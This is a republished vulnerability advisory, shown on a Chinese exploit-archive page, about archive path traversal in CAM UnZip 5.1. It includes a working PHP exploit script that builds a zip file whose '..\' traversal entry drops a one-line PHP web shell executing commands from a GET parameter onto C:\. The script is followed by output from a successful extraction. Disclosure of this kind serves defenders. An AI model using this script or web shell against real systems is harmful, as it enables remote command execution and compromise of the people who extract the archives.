首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 CAM UnZip 5.1 - Archive Path Traversal 来源：hyp3rlinx.altervista.org 作者：hyp3rlinx 发布时间：2016-04-12   [+] Credits: hyp3rlinx   [+] Website: hyp3rlinx.altervista.org   [+] Source: http://hyp3rlinx.altervista.org/advisories/CAMUNZIP-ARCHIVE-PATH-TRAVERSAL.txt     Vendor: ================= www.camunzip.com     Product: ============== CAM UnZip v5.1     Vulnerability Type: ====================== Archive Path Traversal     CVE Reference: ============== N/A     Vulnerability Details: =====================   CAM UnZip fails to check that the paths of the files in the archive do not engage in path traversal when uncompressing the archive files. specially crafted files in the archive containing '..\' in file name can overwrite files on the filesystem by backtracking or allow attackers to place malicious files on system outside of the target unzip directory which may lead to remote command execution exploits etc...   Tested successfully Windows 7     Exploit code(s): ===============   malicious archive script...     <?php #CAM UnZip v5.1 #directory traversal to remote code execution exploit #====================================================   if($argc<2){echo "Usage: <filename>";exit();} $file_name=$argv[1];   $zip = new ZipArchive(); $res = $zip->open("$file_name.zip", ZipArchive::CREATE); $zip->addFromString("..\..\..\..\..\..\..\..\RCE.php", '<?php exec($_GET["cmd"]); ?>'); $zip->close();   echo "Malicious archive created...\r\n"; echo "========= hyp3rlinx ============"; ?>   /////////////////////////////////////////////////////////////////////////////////////   Result:   Creating Folder: C:\Test\BOZO   Extracting Files From: C:\Test\BOZO.zip   Unzipped file C:\Test\BOZO\..\..\..\..\..\..\..\..\RCE.php of size 28   1 file was Extracted.   C:\RCE.php         Exploitation Technique: ======================= Local     Severity Level: ================ Medium     [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.   hyp3rlinx   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Express Zip 2.40 - Path Traver ·Oracle Application Testing Sui ·ExaGrid Known SSH Key / Defaul ·Texas Instrument Emulator 3.03 ·PostgreSQL CREATE LANGUAGE Exe ·Dell KACE K1000 File Upload ·Apple Intel HD 3000 Graphics D ·Internet Explorer 9, 10, 11 - ·MESS 0.154-3.1 Buffer Overflow ·Exim perl_startup Privilege Es ·Linux x86 - Disable ASLR by Se ·Internet Explorer 11 - MSHTML!   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved